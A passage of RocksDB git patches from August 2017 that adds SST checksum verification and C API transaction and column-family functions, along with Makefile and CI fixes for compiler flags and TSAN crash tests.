EnvOptions env_options; + std::vector cfd_list; + { + InstrumentedMutexLock l(&mutex_); + for (auto cfd : *versions_->GetColumnFamilySet()) { + if (!cfd->IsDropped() && cfd->initialized()) { + cfd->Ref(); + cfd_list.push_back(cfd); + } + } + } + std::vector sv_list; + for (auto cfd : cfd_list) { + sv_list.push_back(cfd->GetReferencedSuperVersion(&mutex_)); + } + for (auto& sv : sv_list) { + VersionStorageInfo* vstorage = sv->current->storage_info(); + for (int i = 0; i < vstorage->num_non_empty_levels() && s.ok(); i++) { + for (size_t j = 0; j < vstorage->LevelFilesBrief(i).num_files && s.ok(); + j++) { + const auto& fd = vstorage->LevelFilesBrief(i).files[j].fd; + std::string fname = TableFileName(immutable_db_options_.db_paths, + fd.GetNumber(), fd.GetPathId()); + s = rocksdb::VerifySstFileChecksum(options, env_options, fname); + } + } + if (!s.ok()) { + break; + } + } + { + InstrumentedMutexLock l(&mutex_); + for (auto sv : sv_list) { + if (sv && sv->Unref()) { + sv->Cleanup(); + delete sv; + } + } + for (auto cfd : cfd_list) { + cfd->Unref(); + } + } + return s; +} + void DBImpl::NotifyOnExternalFileIngested( ColumnFamilyData* cfd, const ExternalSstFileIngestionJob& ingestion_job) { #ifndef ROCKSDB_LITE diff --git a/db/db_impl.h b/db/db_impl.h index d057f934524..31d69a97041 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -293,6 +293,8 @@ class DBImpl : public DB { const std::vector& external_files, const IngestExternalFileOptions& ingestion_options) override; + virtual Status VerifyChecksum() override; + #endif // ROCKSDB_LITE // Similar to GetSnapshot(), but also lets the db know that this snapshot diff --git a/db/db_test.cc b/db/db_test.cc index 8d637e579fb..675c403e5cc 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -2235,6 +2235,10 @@ class ModelDB : public DB { return Status::NotSupported("Not implemented."); } + virtual Status VerifyChecksum() override { + return Status::NotSupported("Not implemented."); + } + using DB::GetPropertiesOfAllTables; virtual Status GetPropertiesOfAllTables( ColumnFamilyHandle* column_family, diff --git a/include/rocksdb/convenience.h b/include/rocksdb/convenience.h index cb0c6f56b5c..4a60afb11dc 100644 --- a/include/rocksdb/convenience.h +++ b/include/rocksdb/convenience.h @@ -329,6 +329,11 @@ void CancelAllBackgroundWork(DB* db, bool wait = false); // Snapshots before the delete might not see the data in the given range. Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family, const Slice* begin, const Slice* end); + +// Verify the checksum of file +Status VerifySstFileChecksum(const Options& options, + const EnvOptions& env_options, + const std::string& file_path); #endif // ROCKSDB_LITE } // namespace rocksdb diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index 692932c35de..078c24b4fa8 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -976,6 +976,8 @@ class DB { return IngestExternalFile(DefaultColumnFamily(), external_files, options); } + virtual Status VerifyChecksum() = 0; + // AddFile() is deprecated, please use IngestExternalFile() ROCKSDB_DEPRECATED_FUNC virtual Status AddFile( ColumnFamilyHandle* column_family, diff --git a/include/rocksdb/utilities/stackable_db.h b/include/rocksdb/utilities/stackable_db.h index d2c0dbd7b7d..991de90aab0 100644 --- a/include/rocksdb/utilities/stackable_db.h +++ b/include/rocksdb/utilities/stackable_db.h @@ -95,6 +95,8 @@ class StackableDB : public DB { return db_->IngestExternalFile(column_family, external_files, options); } + virtual Status VerifyChecksum() override { return db_->VerifyChecksum(); } + using DB::KeyMayExist; virtual bool KeyMayExist(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index a0b58c6b26e..5931692f029 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -820,7 +820,6 @@ Status BlockBasedTable::ReadMetaBlock(Rep* rep, std::unique_ptr* iter) { // TODO(sanjay): Skip this if footer.metaindex_handle() size indicates // it is an empty block. - // TODO: we never really verify check sum for meta index block std::unique_ptr meta; Status s = ReadBlockFromFile( rep->file.get(), rep->footer, ReadOptions(), @@ -1746,6 +1745,60 @@ Status BlockBasedTable::Prefetch(const Slice* const begin, return Status::OK(); } +Status BlockBasedTable::VerifyChecksum() { + Status s; + // Check Meta blocks + std::unique_ptr meta; + std::unique_ptr meta_iter; + s = ReadMetaBlock(rep_, &meta, &meta_iter); + if (s.ok()) { + s = VerifyChecksumInBlocks(meta_iter.get()); + if (!s.ok()) { + return s; + } + } else { + return s; + } + // Check Data blocks + BlockIter iiter_on_stack; + InternalIterator* iiter = NewIndexIterator(ReadOptions(), &iiter_on_stack); + std::unique_ptr iiter_unique_ptr; + if (iiter != &iiter_on_stack) { + iiter_unique_ptr = std::unique_ptr(iiter); + } + if (!iiter->status().ok()) { + // error opening index iterator + return iiter->status(); + } + s = VerifyChecksumInBlocks(iiter); + return s; +} + +Status BlockBasedTable::VerifyChecksumInBlocks(InternalIterator* index_iter) { + Status s; + for (index_iter->SeekToFirst(); index_iter->Valid(); index_iter->Next()) { + s = index_iter->status(); + if (!s.ok()) { + break; + } + BlockHandle handle; + Slice input = index_iter->value(); + s = handle.DecodeFrom(&input); + if (!s.ok()) { + break; + } + BlockContents contents; + s = ReadBlockContents(rep_->file.get(), rep_->footer, ReadOptions(), + handle, &contents, rep_->ioptions, + false /* decompress */, Slice() /*compression dict*/, + rep_->persistent_cache_options); + if (!s.ok()) { + break; + } + } + return s; +} + bool BlockBasedTable::TEST_KeyInCache(const ReadOptions& options, const Slice& key) { std::unique_ptr iiter(NewIndexIterator(options)); diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 3acc3a8fb09..3451614c878 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -139,6 +139,8 @@ class BlockBasedTable : public TableReader { // convert SST file to a human readable form Status DumpTable(WritableFile* out_file) override; + Status VerifyChecksum() override; + void Close() override; ~BlockBasedTable(); @@ -310,6 +312,8 @@ class BlockBasedTable : public TableReader { static Status ReadMetaBlock(Rep* rep, std::unique_ptr* meta_block, std::unique_ptr* iter); + Status VerifyChecksumInBlocks(InternalIterator* index_iter); + // Create the filter from the filter block. FilterBlockReader* ReadFilter(const BlockHandle& filter_handle, const bool is_a_filter_partition) const; diff --git a/table/table_reader.h b/table/table_reader.h index 9681d54670e..18fcda27370 100644 --- a/table/table_reader.h +++ b/table/table_reader.h @@ -98,6 +98,11 @@ class TableReader { return Status::NotSupported("DumpTable() not supported"); } + // check whether there is corruption in this db file + virtual Status VerifyChecksum() { + return Status::NotSupported("VerifyChecksum() not supported"); + } + virtual void Close() {} }; diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index 07f34861233..e6322f8b4d9 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -127,6 +127,10 @@ Status SstFileReader::NewTableReader( std::move(file_), file_size, &table_reader_); } +Status SstFileReader::VerifyChecksum() { + return table_reader_->VerifyChecksum(); +} + Status SstFileReader::DumpTable(const std::string& out_filename) { unique_ptr out_file; Env* env = Env::Default(); @@ -349,10 +353,11 @@ void print_help() { --file= Path to SST file or directory containing SST files - --command=check|scan|raw + --command=check|scan|raw|verify check: Iterate over entries in files but dont print anything except if an error is encounterd (default command) scan: Iterate over entries in files and print them to screen raw: Dump all the table contents to _dump.txt + verify: Iterate all the blocks in files verifying checksum to detect possible coruption but dont print anything except if a corruption is encountered --output_hex Can be combined with scan command to print the keys and values in Hex @@ -580,6 +585,17 @@ int SSTDumpTool::Run(int argc, char** argv) { } } + if (command == "verify") { + st = reader.VerifyChecksum(); + if (!st.ok()) { + fprintf(stderr, "%s is corrupted: %s\n", filename.c_str(), + st.ToString().c_str()); + } else { + fprintf(stdout, "The file is ok\n"); + } + continue; + } + if (show_properties || show_summary) { const rocksdb::TableProperties* table_properties; diff --git a/tools/sst_dump_tool_imp.h b/tools/sst_dump_tool_imp.h index 0129d98ebc7..e2b6396071c 100644 --- a/tools/sst_dump_tool_imp.h +++ b/tools/sst_dump_tool_imp.h @@ -30,6 +30,7 @@ class SstFileReader { uint64_t GetReadNumber() { return read_num_; } TableProperties* GetInitTableProperties() { return table_properties_.get(); } + Status VerifyChecksum(); Status DumpTable(const std::string& out_filename); Status getStatus() { return init_result_; } From 1fbad84b69424a1cd5a971514436a3838e5e3cc8 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Wed, 9 Aug 2017 22:39:46 -0700 Subject: [PATCH 089/205] Makefile: correct faligned-new test Summary: Commit 4f81ab38bf18aacdc5f2e2f2a82cf577989ae39b has the test wrong. clang doesn't support a -dumpversion option. By lucky coincidence clang/gcc --version both place a version number at the same output location when --verison is passed. Example output (1st line only). $ clang --version clang version 3.9.1 (tags/RELEASE_391/final) $ gcc --version gcc (GCC) 6.4.1 20170727 (Red Hat 6.4.1-1) During the test of the compiler we ensure that a minimum version is met as Makefile doesn't support patterns. Also xcode9 doesn't seem affected by https://github.com/facebook/rocksdb/issues/2672 and also doesn't have "clang" as the first part of its output so the fix implemented here also is Apple clang friendly. $ clang --version Apple LLVM version 9.0.0 (clang-900.0.31) Signed-off-by: Daniel Black Closes https://github.com/facebook/rocksdb/pull/2699 Differential Revision: D5600818 Pulled By: yiwu-arbug fbshipit-source-id: 3b0f2751becb53c1c35468bf29f3f828e7cf2c2a --- Makefile | 11 ++--------- 1 file changed, 2 insertions(+), 9 deletions(-) diff --git a/Makefile b/Makefile index ef42deecedd..620e7fb2772 100644 --- a/Makefile +++ b/Makefile @@ -259,18 +259,11 @@ default: all WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \ -Wno-unused-parameter -CCVERSION = $(shell $(CXX) -dumpversion) -CCNAME = $(shell $(CXX) --version | awk 'NR==1' | cut -f1 -d " ") +CCFALIGNED := $(shell $(CXX) --version | awk 'NR==1 { split($$3, ver, "."); if (($$1 == "clang" && ver[1] >= 4) || ($$2 == "(GCC)" && ver[1] >= 7)) { print "yes" } }') -ifeq ($(CCNAME), clang) -ifeq ($(CCVERSION), 4*) +ifeq ($(CCFALIGNED), yes) CXXFLAGS += -faligned-new endif -else -ifeq ($(CCVERSION), 7) - CXXFLAGS += -faligned-new -endif -endif ifndef DISABLE_WARNING_AS_ERROR WARNING_FLAGS += -Werror From 23c7d135405ec14618e6e85f95c0582b9049eaa6 Mon Sep 17 00:00:00 2001 From: jimmyway Date: Wed, 9 Aug 2017 22:56:08 -0700 Subject: [PATCH 090/205] fix comment Summary: Signed-off-by: tang.jin Closes https://github.com/facebook/rocksdb/pull/2644 Differential Revision: D5600861 Pulled By: yiwu-arbug fbshipit-source-id: 9516636cb6e77b09fe0ebef78953adf4b7e88cc8 --- db/write_thread.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/db/write_thread.h b/db/write_thread.h index 51bb97f2a8d..57ce71e08f3 100644 --- a/db/write_thread.h +++ b/db/write_thread.h @@ -55,7 +55,7 @@ class WriteThread { // The state used to inform a waiting writer that it has become a // parallel memtable writer. It can be the group leader who launch the - // praallel writer group, or one of the followers. The writer should then + // parallel writer group, or one of the followers. The writer should then // apply its batch to the memtable concurrently and call // CompleteParallelMemTableWriter. STATE_PARALLEL_MEMTABLE_WRITER = 8, From 6a9de434775abb2868132e2d438cfe932e225032 Mon Sep 17 00:00:00 2001 From: FireMail Date: Thu, 10 Aug 2017 11:33:30 -0700 Subject: [PATCH 091/205] Windows.h macro call fix Summary: - moved the max call for numeric limits into paranthesis so that max wont be called as macro when including Closes https://github.com/facebook/rocksdb/pull/2709 Differential Revision: D5600773 Pulled By: yiwu-arbug fbshipit-source-id: fd28b6f7c10ddce21bad4030f2db06f965bb08da --- include/rocksdb/env.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index e2efbdc15fd..709d5036685 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -793,7 +793,7 @@ enum InfoLogLevel : unsigned char { // An interface for writing log messages. class Logger { public: - size_t kDoNotSupportGetLogFileSize = std::numeric_limits::max(); + size_t kDoNotSupportGetLogFileSize = (std::numeric_limits::max)(); explicit Logger(const InfoLogLevel log_level = InfoLogLevel::INFO_LEVEL) : log_level_(log_level) {} From 0cecf8155b8a307862995c77e7f55163faca8b86 Mon Sep 17 00:00:00 2001 From: Oleksandr Anyshchenko Date: Thu, 10 Aug 2017 11:39:32 -0700 Subject: [PATCH 092/205] Write batch for `TransactionDB` in C API Summary: Closes https://github.com/facebook/rocksdb/pull/2655 Differential Revision: D5600858 Pulled By: yiwu-arbug fbshipit-source-id: cf52f9104e348438bf168dc6bf7af3837faf12ef --- db/c.cc | 10 ++++++++++ db/c_test.c | 11 +++++++++++ include/rocksdb/c.h | 4 ++++ 3 files changed, 25 insertions(+) diff --git a/db/c.cc b/db/c.cc index e1af3836e6b..68213e48c4a 100644 --- a/db/c.cc +++ b/db/c.cc @@ -3363,6 +3363,16 @@ void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db, txn_db->rep->Put(options->rep, Slice(key, klen), Slice(val, vlen))); } +//Write batch into transaction db +void rocksdb_transactiondb_write( + rocksdb_transactiondb_t* db, + const rocksdb_writeoptions_t* options, + rocksdb_writebatch_t* batch, + char** errptr) { + SaveError(errptr, db->rep->Write(options->rep, &batch->rep)); +} + + // Delete a key inside a transaction void rocksdb_transaction_delete(rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr) { diff --git a/db/c_test.c b/db/c_test.c index 4bdf89bee52..209af13ac7e 100644 --- a/db/c_test.c +++ b/db/c_test.c @@ -1365,6 +1365,17 @@ int main(int argc, char** argv) { CheckNoError(err); CheckTxnDBGet(txn_db, roptions, "foo", NULL); + // write batch into TransactionDB + rocksdb_writebatch_t* wb = rocksdb_writebatch_create(); + rocksdb_writebatch_put(wb, "foo", 3, "a", 1); + rocksdb_writebatch_clear(wb); + rocksdb_writebatch_put(wb, "bar", 3, "b", 1); + rocksdb_writebatch_put(wb, "box", 3, "c", 1); + rocksdb_writebatch_delete(wb, "bar", 3); + rocksdb_transactiondb_write(txn_db, woptions, wb, &err); + CheckTxnDBGet(txn_db, roptions, "box", "c"); + CheckNoError(err); + // begin a transaction txn = rocksdb_transaction_begin(txn_db, woptions, txn_options, NULL); // put diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index 2d33560390d..3d3c175f918 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -1298,6 +1298,10 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, const char* key, size_t klen, const char* val, size_t vlen, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + rocksdb_writebatch_t *batch, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete( rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr); From 64f8484356ee611d90a77e6b02f6855a5c26cc17 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Thu, 10 Aug 2017 11:56:46 -0700 Subject: [PATCH 093/205] block_cache_tier: fix gcc-7 warnings MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Summary: Error was: utilities/persistent_cache/block_cache_tier.cc: In instantiation of ‘void rocksdb::Add(std::map, double>*, const string&, const T&) [with T = double; std::__cxx11::string = std::__cxx11::basic_string]’: utilities/persistent_cache/block_cache_tier.cc:147:40: required from here utilities/persistent_cache/block_cache_tier.cc:141:23: error: type qualifiers ignored on cast result type [-Werror=ignored-qualifiers] stats->insert({key, static_cast(t)}); fixing like #2562 Closes https://github.com/facebook/rocksdb/pull/2603 Differential Revision: D5600910 Pulled By: yiwu-arbug fbshipit-source-id: 891a5ec7e451d2dec6ad1b6b7fac545657f87363 --- utilities/persistent_cache/block_cache_tier.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/utilities/persistent_cache/block_cache_tier.cc b/utilities/persistent_cache/block_cache_tier.cc index e65952cdb0b..714af2c62a6 100644 --- a/utilities/persistent_cache/block_cache_tier.cc +++ b/utilities/persistent_cache/block_cache_tier.cc @@ -136,7 +136,7 @@ Status BlockCacheTier::Close() { template void Add(std::map* stats, const std::string& key, const T& t) { - stats->insert({key, static_cast(t)}); + stats->insert({key, static_cast(t)}); } PersistentCache::StatsType BlockCacheTier::Stats() { From 25df24254b77911b474012a98cfaedbeae4ded6e Mon Sep 17 00:00:00 2001 From: Stanislav Tkach Date: Thu, 10 Aug 2017 13:40:57 -0700 Subject: [PATCH 094/205] Add column families related functions (C API) Summary: (#2564) Closes https://github.com/facebook/rocksdb/pull/2669 Differential Revision: D5594151 Pulled By: yiwu-arbug fbshipit-source-id: 67ae9446342f3323d6ecad8e811f4158da194270 --- db/c.cc | 85 ++++++++++++++++++++++++++++++++++++++++++++- db/c_test.c | 31 +++++++++++++++++ include/rocksdb/c.h | 34 ++++++++++++++++++ 3 files changed, 149 insertions(+), 1 deletion(-) diff --git a/db/c.cc b/db/c.cc index 68213e48c4a..6952660a1b8 100644 --- a/db/c.cc +++ b/db/c.cc @@ -3249,6 +3249,17 @@ void rocksdb_transaction_options_set_max_write_batch_size( opt->rep.max_write_batch_size = size; } +rocksdb_column_family_handle_t* rocksdb_transactiondb_create_column_family( + rocksdb_transactiondb_t* txn_db, + const rocksdb_options_t* column_family_options, + const char* column_family_name, char** errptr) { + rocksdb_column_family_handle_t* handle = new rocksdb_column_family_handle_t; + SaveError(errptr, txn_db->rep->CreateColumnFamily( + ColumnFamilyOptions(column_family_options->rep), + std::string(column_family_name), &(handle->rep))); + return handle; +} + rocksdb_transactiondb_t* rocksdb_transactiondb_open( const rocksdb_options_t* options, const rocksdb_transactiondb_options_t* txn_db_options, const char* name, @@ -3325,6 +3336,27 @@ char* rocksdb_transaction_get(rocksdb_transaction_t* txn, return result; } +char* rocksdb_transaction_get_cf(rocksdb_transaction_t* txn, + const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, size_t* vlen, + char** errptr) { + char* result = nullptr; + std::string tmp; + Status s = + txn->rep->Get(options->rep, column_family->rep, Slice(key, klen), &tmp); + if (s.ok()) { + *vlen = tmp.size(); + result = CopyString(tmp); + } else { + *vlen = 0; + if (!s.IsNotFound()) { + SaveError(errptr, s); + } + } + return result; +} + // Read a key outside a transaction char* rocksdb_transactiondb_get( rocksdb_transactiondb_t* txn_db, @@ -3347,6 +3379,26 @@ char* rocksdb_transactiondb_get( return result; } +char* rocksdb_transactiondb_get_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, size_t* vallen, char** errptr) { + char* result = nullptr; + std::string tmp; + Status s = txn_db->rep->Get(options->rep, column_family->rep, + Slice(key, keylen), &tmp); + if (s.ok()) { + *vallen = tmp.size(); + result = CopyString(tmp); + } else { + *vallen = 0; + if (!s.IsNotFound()) { + SaveError(errptr, s); + } + } + return result; +} + // Put a key inside a transaction void rocksdb_transaction_put(rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val, size_t vlen, @@ -3354,6 +3406,14 @@ void rocksdb_transaction_put(rocksdb_transaction_t* txn, const char* key, SaveError(errptr, txn->rep->Put(Slice(key, klen), Slice(val, vlen))); } +void rocksdb_transaction_put_cf(rocksdb_transaction_t* txn, + rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, const char* val, + size_t vlen, char** errptr) { + SaveError(errptr, txn->rep->Put(column_family->rep, Slice(key, klen), + Slice(val, vlen))); +} + //Put a key outside a transaction void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, @@ -3363,6 +3423,16 @@ void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db, txn_db->rep->Put(options->rep, Slice(key, klen), Slice(val, vlen))); } +void rocksdb_transactiondb_put_cf(rocksdb_transactiondb_t* txn_db, + const rocksdb_writeoptions_t* options, + rocksdb_column_family_handle_t* column_family, + const char* key, size_t keylen, + const char* val, size_t vallen, + char** errptr) { + SaveError(errptr, txn_db->rep->Put(options->rep, column_family->rep, + Slice(key, keylen), Slice(val, vallen))); +} + //Write batch into transaction db void rocksdb_transactiondb_write( rocksdb_transactiondb_t* db, @@ -3372,13 +3442,18 @@ void rocksdb_transactiondb_write( SaveError(errptr, db->rep->Write(options->rep, &batch->rep)); } - // Delete a key inside a transaction void rocksdb_transaction_delete(rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr) { SaveError(errptr, txn->rep->Delete(Slice(key, klen))); } +void rocksdb_transaction_delete_cf( + rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, char** errptr) { + SaveError(errptr, txn->rep->Delete(column_family->rep, Slice(key, klen))); +} + // Delete a key outside a transaction void rocksdb_transactiondb_delete(rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, @@ -3386,6 +3461,14 @@ void rocksdb_transactiondb_delete(rocksdb_transactiondb_t* txn_db, SaveError(errptr, txn_db->rep->Delete(options->rep, Slice(key, klen))); } +void rocksdb_transactiondb_delete_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, char** errptr) { + SaveError(errptr, txn_db->rep->Delete(options->rep, column_family->rep, + Slice(key, keylen))); +} + // Create an iterator inside a transaction rocksdb_iterator_t* rocksdb_transaction_create_iterator( rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options) { diff --git a/db/c_test.c b/db/c_test.c index 209af13ac7e..95d27360748 100644 --- a/db/c_test.c +++ b/db/c_test.c @@ -348,6 +348,20 @@ static void CheckTxnDBGet( Free(&val); } +static void CheckTxnDBGetCF(rocksdb_transactiondb_t* txn_db, + const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, + const char* key, const char* expected) { + char* err = NULL; + size_t val_len; + char* val; + val = rocksdb_transactiondb_get_cf(txn_db, options, column_family, key, + strlen(key), &val_len, &err); + CheckNoError(err); + CheckEqual(expected, val, val_len); + Free(&val); +} + int main(int argc, char** argv) { rocksdb_t* db; rocksdb_comparator_t* cmp; @@ -1432,6 +1446,23 @@ int main(int argc, char** argv) { CheckNoError(err); CheckTxnDBGet(txn_db, roptions, "bar", NULL); + // Column families. + rocksdb_column_family_handle_t* cfh; + cfh = rocksdb_transactiondb_create_column_family(txn_db, options, + "txn_db_cf", &err); + CheckNoError(err); + + rocksdb_transactiondb_put_cf(txn_db, woptions, cfh, "cf_foo", 6, "cf_hello", + 8, &err); + CheckNoError(err); + CheckTxnDBGetCF(txn_db, roptions, cfh, "cf_foo", "cf_hello"); + + rocksdb_transactiondb_delete_cf(txn_db, woptions, cfh, "cf_foo", 6, &err); + CheckNoError(err); + CheckTxnDBGetCF(txn_db, roptions, cfh, "cf_foo", NULL); + + rocksdb_column_family_handle_destroy(cfh); + // close and destroy rocksdb_transaction_destroy(txn); rocksdb_transactiondb_close(txn_db); diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index 3d3c175f918..077030775f7 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -1256,6 +1256,12 @@ extern ROCKSDB_LIBRARY_API void rocksdb_delete_file_in_range_cf( /* Transactions */ +extern ROCKSDB_LIBRARY_API rocksdb_column_family_handle_t* +rocksdb_transactiondb_create_column_family( + rocksdb_transactiondb_t* txn_db, + const rocksdb_options_t* column_family_options, + const char* column_family_name, char** errptr); + extern ROCKSDB_LIBRARY_API rocksdb_transactiondb_t* rocksdb_transactiondb_open( const rocksdb_options_t* options, const rocksdb_transactiondb_options_t* txn_db_options, const char* name, @@ -1286,18 +1292,37 @@ extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get( rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, char** errptr); +extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_cf( + rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, size_t klen, + size_t* vlen, char** errptr); + extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get( rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, char** errptr); +extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, size_t* vallen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transaction_put( rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val, size_t vlen, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transaction_put_cf( + rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, const char* val, size_t vlen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, const char* key, size_t klen, const char* val, size_t vlen, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, const char* val, size_t vallen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, rocksdb_writebatch_t *batch, char** errptr); @@ -1305,10 +1330,19 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write( extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete( rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete_cf( + rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_delete( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, const char* key, size_t klen, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_delete_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, char** errptr); + extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_transaction_create_iterator(rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options); From b87ee6f7736a0e22cb72b188c1167eab38b25a09 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Thu, 10 Aug 2017 17:53:54 -0700 Subject: [PATCH 095/205] Use more keys per lock in daily TSAN crash test Summary: TSAN shows error when we grab too many locks at the same time. In TSAN crash test, make one shard key cover 2^22 keys so that no many keys will be hold at the same time. Closes https://github.com/facebook/rocksdb/pull/2719 Differential Revision: D5609035 Pulled By: siying fbshipit-source-id: 930e5d63fff92dbc193dc154c4c615efbdf06c6a --- Makefile | 8 ++++---- build_tools/rocksdb-lego-determinator | 2 +- tools/db_crashtest.py | 1 + 3 files changed, 6 insertions(+), 5 deletions(-) diff --git a/Makefile b/Makefile index 620e7fb2772..87831fc1aef 100644 --- a/Makefile +++ b/Makefile @@ -802,8 +802,8 @@ ldb_tests: ldb crash_test: whitebox_crash_test blackbox_crash_test blackbox_crash_test: db_stress - python -u tools/db_crashtest.py --simple blackbox - python -u tools/db_crashtest.py blackbox + python -u tools/db_crashtest.py --simple blackbox $(CRASH_TEST_EXT_ARGS) + python -u tools/db_crashtest.py blackbox $(CRASH_TEST_EXT_ARGS) ifeq ($(CRASH_TEST_KILL_ODD),) CRASH_TEST_KILL_ODD=888887 @@ -811,9 +811,9 @@ endif whitebox_crash_test: db_stress python -u tools/db_crashtest.py --simple whitebox --random_kill_odd \ - $(CRASH_TEST_KILL_ODD) + $(CRASH_TEST_KILL_ODD) $(CRASH_TEST_EXT_ARGS) python -u tools/db_crashtest.py whitebox --random_kill_odd \ - $(CRASH_TEST_KILL_ODD) + $(CRASH_TEST_KILL_ODD) $(CRASH_TEST_EXT_ARGS) asan_check: $(MAKE) clean diff --git a/build_tools/rocksdb-lego-determinator b/build_tools/rocksdb-lego-determinator index 300a60aab95..a40b3064e44 100755 --- a/build_tools/rocksdb-lego-determinator +++ b/build_tools/rocksdb-lego-determinator @@ -564,7 +564,7 @@ TSAN_CRASH_TEST_COMMANDS="[ { 'name':'Compile and run', 'timeout': 86400, - 'shell':'set -o pipefail && $SHM $DEBUG $TSAN CRASH_TEST_KILL_ODD=1887 make J=1 crash_test || $CONTRUN_NAME=tsan_crash_test $TASK_CREATION_TOOL', + 'shell':'set -o pipefail && $SHM $DEBUG $TSAN CRASH_TEST_KILL_ODD=1887 CRASH_TEST_EXT_ARGS=--log2_keys_per_lock=22 make J=1 crash_test || $CONTRUN_NAME=tsan_crash_test $TASK_CREATION_TOOL', 'user':'root', $PARSER }, diff --git a/tools/db_crashtest.py b/tools/db_crashtest.py index 83c1e013b64..d64da7ac1fb 100644 --- a/tools/db_crashtest.py +++ b/tools/db_crashtest.py @@ -44,6 +44,7 @@ "verify_checksum": 1, "write_buffer_size": 4 * 1024 * 1024, "writepercent": 35, + "log2_keys_per_lock": 2, "subcompactions": lambda: random.randint(1, 4), "use_merge": lambda: random.randint(0, 1), "use_full_merge_v1": lambda: random.randint(0, 1), From ad77ee0ea02133d16cd76ddd0624cc4ae402422c Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Thu, 10 Aug 2017 21:10:41 -0700 Subject: [PATCH 